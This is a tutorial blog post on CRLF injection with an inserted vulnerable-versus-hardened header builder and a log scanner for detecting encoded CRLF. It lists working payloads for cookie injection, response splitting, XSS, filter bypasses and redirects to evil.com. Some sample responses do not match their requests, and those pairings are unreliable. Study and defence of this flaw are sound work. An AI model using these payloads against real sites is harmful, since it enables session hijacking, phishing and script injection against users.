Introduction:
CRLF injection is an attack against web applications that place user input into HTTP headers without filtering: by embedding line-terminator characters in the input, an attacker can inject arbitrary HTTP headers into the response. This vulnerability can lead to a range of security issues, including cookie hijacking, session fixation, and even server-side request forgery.
In this blog post, we'll dive deeper into CRLF injection, its impact on web application security, and how to prevent it.
What is CRLF Injection?
CRLF stands for "Carriage Return Line Feed" and refers to the two characters (\r\n) that mark the end of a line in HTTP headers. CRLF injection is a technique in which an attacker places these characters in input that the server reflects into a header, so that the attacker controls the rest of the response the web server sends. This enables a range of attacks, including cookie poisoning, cache poisoning, and cross-site scripting (XSS).
Let us look at an example of CRLF injection.
Normal Request:
GET / HTTP/1.1\r\n
Host: testphp.vulnweb.com\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Accept-Encoding: gzip, deflate\r\n
Referer: https://www.google.com/\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
Response:
HTTP/1.1 200 OK
Server: nginx/1.19.0
Date: Fri, 30 Sep 2022 11:55:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
CRLF Request:
Host: testphp.vulnweb.com\r\n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0\r\n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\r\n
Accept-Language: en-US,en;q=0.5\r\n
Accept-Encoding: gzip, deflate\r\n
Referer: https://www.google.com/\r\n
Connection: keep-alive\r\n
Upgrade-Insecure-Requests: 1\r\n
Response:
HTTP/1.1 200 OK
Server: nginx/1.19.0
Set-Cookie: CRLFInjection=Fas3c7
Date: Fri, 30 Sep 2022 11:55:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
Payload: /%0d%0aSet-Cookie:CRLFInjection=Fas3c7
Let's break the payload down and understand it.
%0d and %0a are encoded forms of \r and \n respectively.
1. Cookie Injection
Request URL:
http://testphp.vulnweb.com/%0d%0aSet-Cookie:FakeCookie=Fas3c7
Request headers:
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.google.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Server: nginx/1.19.0
Set-Cookie: FakeCookie=Fas3c7
Date: Fri, 30 Sep 2022 14:46:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
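To make the cookie-injection example above concrete from the server side, here is an added example (not code from the original post) of a response builder that writes a user-controlled value into a header, once unchecked and once guarded by a control-character check. The builder, the `language` cookie name and the parsing helper are constructed for illustration; the injected cookie is the one the post uses (`Set-Cookie: CRLFInjection=Fas3c7`).

```python
"""Added example: how a CR/LF inside a header value splits the response,
and the check that stops it. Not code from the original post; the response
builder, header name and parser are constructed for illustration.
"""
from typing import List, Tuple

# What the server sees after URL-decoding the post's payload
# "%0d%0aSet-Cookie:CRLFInjection=Fas3c7" (constructed input value).
ATTACK_VALUE = "en\r\nSet-Cookie: CRLFInjection=Fas3c7"
BENIGN_VALUE = "en"


def _render(lang: str) -> bytes:
    """Shared response template; `lang` ends up in a Set-Cookie header."""
    return (
        "HTTP/1.1 200 OK\r\n"
        "Content-Type: text/html; charset=UTF-8\r\n"
        f"Set-Cookie: language={lang}\r\n"
        "\r\n"
        "<html>ok</html>"
    ).encode("latin-1")  # HTTP/1.1 header bytes are read as Latin-1


def build_response_vulnerable(lang: str) -> bytes:
    """Vulnerable builder: the value goes into the header unchecked.

    A \\r\\n inside `lang` ends the Set-Cookie line early, and whatever
    follows is emitted as though the server had written it as its own header.
    """
    return _render(lang)


def safe_header_value(value: str) -> str:
    """Reject (rather than silently strip) any control character.

    Rejecting makes the attempt visible in logs; stripping only \\r\\n would
    still let a bare \\n through on servers that accept LF alone as a line end.
    """
    if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
        raise ValueError("control character in header value")
    return value


def build_response_hardened(lang: str) -> bytes:
    """Hardened builder: same template, value validated first."""
    return _render(safe_header_value(lang))


def parse_headers(raw: bytes) -> List[Tuple[str, str]]:
    """Minimal header parser standing in for the browser: (name, value)
    pairs from the block between the status line and the blank line."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    pairs = []
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        pairs.append((name.strip(), value.strip()))
    return pairs


def cookies_set(raw: bytes) -> List[str]:
    """The Set-Cookie values a browser would act on for this response."""
    return [v for n, v in parse_headers(raw) if n.lower() == "set-cookie"]


if __name__ == "__main__":
    # Vulnerable path: the browser sees two cookies, one written by the attacker.
    print(cookies_set(build_response_vulnerable(ATTACK_VALUE)))
    # Hardened path: the same value is refused before any header is written.
    try:
        build_response_hardened(ATTACK_VALUE)
    except ValueError as exc:
        print("hardened builder refused:", exc)
```

Most current web frameworks apply a check like `safe_header_value` themselves, so the vulnerable shape is usually found in hand-written servers, proxies and legacy code that assemble header bytes directly; the check belongs at the point where the already-decoded value is written, because every encoding variant of the payload decodes to the same two bytes.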
HackerOne Reports:
Read more: https://hackerone.com/hacktivity?order_direction=DESC&order_field=popular&filter=type%3Apublic&querystring=crlf%20injection
Request:
GET //%0ASet-Cookie:%20crlfinjetion=%20value%0A%0A<img src=x onerror=Prompt(1)> HTTP/1.1
Host: testphp.vulnweb.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://www.google.com/
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Server: nginx/1.19.0
Set-Cookie: FakeCookie=Fas3c7
Date: Fri, 30 Sep 2022 14:46:59 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.6.40-38+ubuntu20.04.1+deb.sury.org+1
Content-Encoding: gzip
Requested page:
http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
Response:
HTTP/1.1 200 OK
Date: Tue, 20 Dec 2016 14:34:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 22907
Connection: close
X-Frame-Options: SAMEORIGIN
Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
ETag: "842fe-597b-54415a5c97a80"
Vary: Accept-Encoding
X-UA-Compatible: IE=edge
Server: NetDNA-cache/2.2
Link: <https://example.com/[INJECTION STARTS HERE]
Content-Length:35
X-XSS-Protection:0
23
<svg onload=alert(document.domain)>
0
CRLF - Write HTML
http://www.example.net/index.php?lang=en%0D%0AContent-Length%3A%200%0A%20%0AHTTP/1.1%20200%20OK%0AContent-Type%3A%20text/html%0ALast-Modified%3A%20Mon%2C%2027%20Oct%202060%2014%3A50%3A18%20GMT%0AContent-Length%3A%2034%0A%20%0A%3Chtml%3EYou%20have%20been%20Phished%3C/html%3E
Response:
Set-Cookie:en
Content-Length: 0
HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
Content-Length: 34
<html>You have been Phished</html>
CRLF - Filter Bypass
Using UTF-8 encoding
%BCsvg/onload=alert%28innerHTML%28%29%E5%98%BE
Reminder:
- %E5%98%8A = %0A = \u560a
- %E5%98%8D = %0D = \u560d
- %E5%98%BE = %3E = \u563e (>)
- %E5%98%BC = %3C = \u563c (<)
Look for parameters that lead to redirects and fuzz them.
Redirect
- Basic payload
https://example.com/?lang=en%0D%0ALocation:%20https://evil.com/
The response is:
HTTP/1.1 200 OK
Content-Type: text/html
Date: Mon, 09 May 2016 14:47:29 GMT
Set-Cookie: language=en
Location: https://evil.com/
- Double encode
https://example.com/?lang=en%250D%250ALocation:%20https://evil.com/
- Bypass Unicode
https://example.com/?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/
Automation:
Cli Automation:
Impact of CRLF Injection:
The impact of CRLF injection can be significant: it allows attackers to inject arbitrary headers, modify cookies, and redirect users to malicious websites. If an attacker is able to inject a "Location" header, they can redirect users to a phishing website or to a site that installs malware. CRLF injection can also be used to bypass security controls such as firewalls, allowing attackers to execute attacks that would otherwise be blocked.
Preventing CRLF Injection:
To prevent CRLF injection, it is essential to validate user input and to filter out of any output the characters that can be used for injection (the carriage-return and line-feed characters). This can be done with input validation and sanitization, and by encoding user input before placing it in HTTP headers. It is also important to follow secure coding practices and to design the web application with security in mind. Regular vulnerability assessments and penetration testing can identify CRLF injection vulnerabilities so that they can be remediated before they are exploited.
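The filter-bypass and redirect sections above list the encodings an attacker may use (%0D%0A, the double-encoded %250D%250A, and the Unicode form %E5%98%8A / %E5%98%8D), and the prevention section points to assessments as the way to find the weakness. Here is an added example (not from the original post) of the detection side: a scanner that decodes request targets from an access log layer by layer and reports which line-break form appeared at which decoding depth. The combined-log format, the log lines and the field names are constructed for this example; flagging U+560A/U+560D assumes the server might mishandle those code points in the way the bypass section describes.

```python
"""Added example (not from the original post): scanning request logs for the
CRLF encodings the post lists, including double-encoded (%250D%250A) and the
Unicode form (%E5%98%8A / %E5%98%8D). Log format and sample lines are
constructed; they are not real traffic.
"""
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Characters that can become a header line break once the server has decoded
# the request. U+560A and U+560D are what the post's Unicode bypass decodes to;
# they are flagged because some stacks reduced such code points to the low byte.
LINE_BREAKS = {"\r": "CR", "\n": "LF", "\u560a": "U+560A", "\u560d": "U+560D"}

# Combined-log-style line (constructed format); only the request target is used.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample: one benign request, the post's cookie payload, the
# double-encoded redirect, the Unicode redirect, and a benign %20.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Sep/2022:11:55:01 +0000] "GET / HTTP/1.1" 200 5123
203.0.113.5 - - [30/Sep/2022:11:55:07 +0000] "GET /%0d%0aSet-Cookie:CRLFInjection=Fas3c7 HTTP/1.1" 200 5123
203.0.113.5 - - [30/Sep/2022:11:55:12 +0000] "GET /?lang=en%250D%250ALocation:%20https://evil.com/ HTTP/1.1" 200 5123
203.0.113.5 - - [30/Sep/2022:11:55:19 +0000] "GET /?lang=en%E5%98%8A%E5%98%8DLocation:%20https://evil.com/ HTTP/1.1" 200 5123
203.0.113.5 - - [30/Sep/2022:11:55:25 +0000] "GET /search?q=a%20b HTTP/1.1" 200 5123
"""


def decode_layers(value: str, max_rounds: int = 3) -> List[str]:
    """Percent-decode repeatedly and return every intermediate form.

    Layer 0 is the raw target; layer 1 exposes %0D%0A and the UTF-8 form;
    layer 2 exposes the double-encoded %250D%250A. Stops once a round
    changes nothing, so benign targets cost one round.
    """
    layers = [value]
    for _ in range(max_rounds):
        decoded = unquote(layers[-1])
        if decoded == layers[-1]:
            break
        layers.append(decoded)
    return layers


def crlf_findings(value: str) -> List[Tuple[str, int]]:
    """(label, depth) for each line-break character, at the shallowest
    decoding depth where it first appears; empty list means clean."""
    found: Dict[str, int] = {}
    for depth, layer in enumerate(decode_layers(value)):
        for ch, label in LINE_BREAKS.items():
            if ch in layer and label not in found:
                found[label] = depth
    return sorted(found.items(), key=lambda item: (item[1], item[0]))


def scan_log(text: str) -> List[dict]:
    """Return one record per log line whose request target carries a CRLF form."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue  # unparsable line: skip rather than guess
        findings = crlf_findings(m["target"])
        if findings:
            hits.append({"ts": m["ts"], "status": m["status"],
                         "target": m["target"], "findings": findings})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["findings"], hit["target"])
```

The depth value is the useful part of each finding: depth 1 is an ordinary encoded payload, depth 2 means the double-encoded variant that only matters if something in the stack decodes twice, and a U+560A/U+560D finding only matters if the server or a component in front of it truncates such code points. That lets the result be triaged against what the application actually does rather than treated as a single alert type.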
Conclusion:
CRLF injection is a serious security vulnerability that can have significant consequences for web application security. By understanding how CRLF injection works and implementing best practices to prevent it, web application developers and security professionals can help ensure that their applications are secure and that users are protected from harm. Regular testing and vulnerability assessments help ensure that CRLF injection vulnerabilities are detected and remediated in a timely manner.
If you have any doubts, please let me know.